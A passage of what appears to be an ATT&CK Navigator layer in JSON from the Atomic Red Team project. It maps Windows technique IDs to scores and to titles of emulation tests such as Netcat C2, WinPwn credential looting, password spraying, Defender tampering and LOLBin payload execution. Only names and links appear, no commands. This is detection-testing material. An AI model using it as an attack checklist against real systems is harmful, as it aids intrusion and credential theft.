Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":4,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n- ESXi - Brute Force Until Account Lockout\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.001","score":1,"enabled":true,"comment":"\n- Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View 